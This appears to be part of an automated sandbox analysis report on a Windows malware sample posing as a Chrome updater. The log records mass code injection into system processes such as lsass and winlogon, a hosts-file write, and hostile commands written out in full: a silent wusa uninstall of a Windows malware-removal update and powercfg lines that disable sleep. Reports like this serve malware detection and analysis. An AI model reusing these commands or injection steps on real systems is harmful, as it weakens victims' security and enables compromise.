            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 311A273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6C5273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 47BC273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5F4273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9F94273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CA85273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 80B3273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 80B6273C
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 1F385B90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 2A2911C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 14E255D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 283E0EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 1F385BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 2A2919C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 14E25F00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 283E0F10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FB53990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CBD8BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F2BD130000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 229F8B70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2938AFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2258F3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26F54840000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22B76580000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1265E790000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 18510D30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 200A2B70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F33CBD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FAB73D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D3E96E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2389D0D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22E66FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A4D6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20763780000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 200FF1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23CC6130000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 266F1070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26008BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 12E54DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2CF20530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FDE9EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19EA6340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ED5C5A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC464E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 15B351A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C38C460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DC09A20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C73F940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1616A5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 181C5E90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 18E3AF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D70B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26DA05C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C9B0460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23A7CF40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 184FCB80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\sihost.exe base: 1CF1ED70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1697C550000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F0FE030000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC093B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C8004A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ctfmon.exe base: 118D8250000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 27687590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 28FAA0B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\explorer.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19292570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dasHost.exe base: 2A31FCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 221CFED0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E810000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 15DAA130000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 269FBD60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14A28E00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19605730000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87EE60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29B94950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 22978560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C3311C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BC39FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA311A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ECA6C50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17847BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 231D5F40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D49F940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 24FCA850000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: PID: 3504 base: B20000 value: 4D
Source: C:\Users\user\Desktop\file.exe Thread register set: target process: 7296
Source: C:\ProgramData\Google\Chrome\updater.exe Thread register set: target process: 7176
Source: C:\ProgramData\Google\Chrome\updater.exe Thread register set: target process: 5948
Source: C:\ProgramData\Google\Chrome\updater.exe Thread register set: target process: 5568
Source: C:\Users\user\Desktop\file.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 1F385B90000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 2A2911C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 14E255D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 283E0EE0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 231D5F30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 1F385BF0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 2A2919C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 14E25F00000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 283E0F10000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FB53990000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CBD8BA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F2BD130000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 229F8B70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2938AFD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2258F3D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26F54840000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22B76580000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1265E790000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 18510D30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 200A2B70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F33CBD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FAB73D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D3E96E0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2389D0D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22E66FD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A4D6530000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20763780000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 200FF1A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23CC6130000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 266F1070000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26008BB0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 12E54DA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2CF20530000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FDE9EA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19EA6340000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: A50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ED5C5A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC464E0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 15B351A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C38C460000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DC09A20000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C73F940000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1616A5B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 181C5E90000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 18E3AF30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D70B1D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26DA05C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C9B0460000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23A7CF40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 184FCB80000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\sihost.exe base: 1CF1ED70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1697C550000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F0FE030000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC093B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C8004A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ctfmon.exe base: 118D8250000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 27687590000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 28FAA0B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\explorer.exe base: B20000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19292570000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dasHost.exe base: 2A31FCE0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 221CFED0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E810000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 15DAA130000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 269FBD60000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14A28E00000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19605730000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87EE60000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29B94950000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 22978560000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C3311C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BC39FC0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA311A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ECA6C50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17847BC0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 231D5F40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D49F940000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 24FCA850000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B60000
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\dialer.exe Code function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 25_2_0000000140001B54
Source: C:\Windows\System32\dialer.exe Code function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 25_2_0000000140001B54
Source: winlogon.exe, 0000001F.00000000.1385824484.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2577899056.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.1405448442.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 0000001F.00000000.1385824484.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2577899056.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.1405448442.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000001F.00000000.1385824484.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2577899056.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.1405448442.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 0000001F.00000000.1385824484.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2577899056.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.1405448442.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: dwm.exe, 00000029.00000002.2583120583.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000029.00000000.1403724912.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerS
Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BA36F0 cpuid 31_2_000001F385BA36F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\dialer.exe | Code function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 25_2_0000000140001B54
Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001F385BC7960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 31_2_000001F385BC7960
Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
